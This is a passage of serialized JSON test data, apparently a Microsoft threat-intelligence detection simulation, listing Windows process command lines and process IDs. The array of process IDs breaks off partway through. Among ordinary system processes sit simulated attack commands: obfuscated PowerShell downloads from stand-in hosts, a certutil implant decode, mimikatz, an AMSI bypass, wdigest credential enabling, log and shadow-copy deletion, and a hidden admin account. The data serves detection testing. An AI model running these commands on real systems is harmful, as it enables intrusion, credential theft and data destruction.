\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -P...\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\Desir...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60...\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"nan\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com...\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe -b -t -m\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest ...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b ...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAc...\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DW...\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DW...\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -...\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roamin...\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1....\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [...\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S...\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D...\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change D...\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Sit...\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo ...\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils')....\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzz...\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/...\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Se...\",\"sc delete MSTICTestService\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"nan\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"nan\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1C...\"],\"__proc_id$$\":[\"PID: 0x888\",\"PID: 0x364\",\"PID: 0x1c4\",\"PID: 0x99c\",\"PID: 0x93c\",\"PID: 0xfbc\",\"PID: 0x244\",\"PID: 0x1050\",\"PID: 0x690\",\"PID: 0x1364\",\"PID: 0x8e4\",\"PID: 0x10fc\",\"PID: 0x1298\",\"PID: 0x138c\",\"PID: 0x1258\",\"PID: 0xf94\",\"PID: 0xddc\",\"PID: 0xbe8\",\"PID: 0x130c\",\"PID: 0x1370\",\"PID: 0xc18\",\"PID: 0xa84\",\"PID: 0x1348\",\"PID: 0x11b4\",\"PID: 0x1148\",\"PID: 0x10e0\",\"PID: 0x12fc\",\"PID: 0x518\",\"PID: 0x13b4\",\"PID: 0xd64\",\"PID: 0xc18\",\"PID: 0x108c\",\"PID: 0x28c\",\"PID: 0x11b4\",\"PID: 0xf84\",\"PID: 0xd64\",\"PID: 0xc18\",\"PID: 0x123c\",\"PID: 0x10a4\",\"PID: 0x1040\",\"PID: 0x690\",\"PID: 0x11ac\",\"PID: 0xc18\",\"PID: 0x1284\",\"PID: 0xb10\",\"PID: 0x2a8\",\"PID: 0x544\",\"PID: 0x130c\",\"PID: 0xc84\",\"PID: 0x570\",\"PID: 0x28c\",\"PID: 0xd14\",\"PID: 0xbd8\",\"PID: 0x123c\",\"PID: 0xcd8\",\"PID: 0x894\",\"PID: 0xde8\",\"PID: 0x1298\",\"PID: 0xc84\",\"PID: 0x690\",\"PID: 0x123c\",\"PID: 0xa10\",\"PID: 0x2f8\",\"PID: 0x13a4\",\"PID: 0x11e8\",\"PID: 0x364\",\"PID: 0x338\",\"PID: 0xbdc\",\"PID: 0x57c\",\"PID: 0x10fc\",\"PID: 0x1054\",\"PID: 0x638\",\"PID: 0x107c\",\"PID: 0x1064\",\"PID: 0x16c4\",\"PID: 0x17fc\",\"PID: 0x17f0\",\"PID: 0x1404\",\"PID: 0x1594\",\"PID: 0x1630\",\"PID: 0x16a0\",\"PID: 0x1658\",\"PID: 0x1740\",\"PID: 0x1490\",\"PID: 0x148c\",\"PID: 0x1530\",\"PID: 0x7b4\",\"PID: 0x1550\",\"PID: 0x15d0\",\"PID: 0x16d0\",\"PID: 0x11a8\",\"PID: 0x1610\",\"PID: 0x1790\",\"PID: 0x1258\",\"PID: 0x28c\",\"PID: 0xac4\",\"PID: 0x364\",\"PID: 0x1128\",\"PID: 0x13e0\",\"PID: 0x12e8\",\"PID: 0x11e4\",\"PID: 0xa08\",\"PID: 0x125c\",\"PID: 0x1020\",\"PID: 0x1380\",\"PID: 0x1254\",\"PID: 0x13e4\",\"PID: 0x10e4\",\"PID: 0xfbc\",\"PID: 0xa4\",\"PID: 0x11cc\",\"PID: 0x99c\",\"PID: 0x11b0\",\"PID: 0x1d0\",\"PID: 0xd14\",\"PID: 0x1128\",\"PID: 0x13fc\",\"PID: 0x123c\",\"PID: 0x6bc\",\"PID: 0x1388\",\"PID: 0xc08\",\"PID: 0x364\",\"PID: 0x12fc\",\"PID: 0x12dc\",\"PID: 0xb8\",\"PID: 0x11b4\",\"PID: 0xbdc\",\"PID: 0x54c\",\"PID: 0xfbc\",\"PID: 0x640\",\"PID: 0x13b0\",\"PID: 0x13b4\",\"PID: 0x1148\",\"PID: 0xc08\",\"PID: 0x1338\",\"PID: 0x6ec\",\"PID: 0x6d4\",\"PID: 0xd14\",\"PID: 0x1094\",\"PID: 0x1270\",\"PID: 0x6ec\",\"PID: 0xaa8\",\"PID: 0x138c\",\"PID: 0xa60\",\"PID: 0x280\",\"PID: 0xab8\",\"PID: 0xb8\",\"PID: 0x7f8\",\"PID: 0x1040\",\"PID: 0xe34\",\"PID: 0x5cc\",\"PID: 0xe3c\",\"PID: 0xf94\",\"PID: 0x10e0\",\"PID: 0xb50\",\"PID: 0xd04\",\"PID: 0x90c\",\"PID: 0xb8\",\"PID: 0xa10\",\"PID: 0x244\",\"PID: 0xc54\",\"PID: 0x778\",\"PID: 0xe68\",\"PID: 0xc08\",\"PID: 0xd78\",\"PID: 0x10c8\",\"PID: 0x1434\",\"PID: 0x1694\",\"PID: 0x1220\",\"PID: 0x1414\",\"PID: 0x13b4\",\"PID: 0xcd8\",\"PID: 0xc54\",\"PID: 0x10f4\",\"PID: 0x5cc\",\"PID: 0x90c\",\"PID: 0x13a8\",\"PID: 0x11c4\",\"PID: 0x13e8\",\"PID: 0x1338\",\"PID: 0x1020\",\"PID: 0x1070\",\"PID: 0x1320\",\"PID: 0xde8\",\"PID: 0xb8\",\"PID: 0xc10\",\"PID: 0x440\",\"PID: 0xd14\",\"PID: 0xbc8\",\"PID: 0x10cc\",\"PID: 0x1288\",\"PID: 0x3dc\",\"PID: 0x2a8\",\"PID: 0xa5c\",\"PID: 0xfc0\",\"PID: 0x10b8\",\"PID: 0xcd8\",\"PID: 0x12fc\",\"PID: 0xc18\",\"PID: 0xbb4\",\"PID: 0x1274\",\"PID: 0x614\",\"PID: 0xd10\",\"PID: 0x135c\",\"PID: 0x103c\",\"PID: 0x1014\",\"PID: 0xbb4\",\"PID: 0x11cc\",\"PID: 0x123c\",\"PID: 0x132c\",\"PID: 0xa08\",\"PID: 0x4e8\",\"PID: 0x240\",\"PID: 0x1450\",\"PID: 0x1250\",\"PID: 0x1458\",\"PID: 0x140c\",\"PID: 0x1448\",\"PID: 0x142c\",\"PID: 0x1498\",\"PID: 0x14ac\",\"PID: 0x14cc\",\"PID: 0x14e0\",\"PID: 0x1500\",\"PID: 0x1514\",\"PID: 0x1534\",\"PID: 0x154c\",\"PID: 0x156c\",\"PID: 0x1580\",\"PID: 0x15a0\",\"PID: 0x15b4\",\"PID: 0x15d4\",\"PID: 0x15e8\",\"PID: 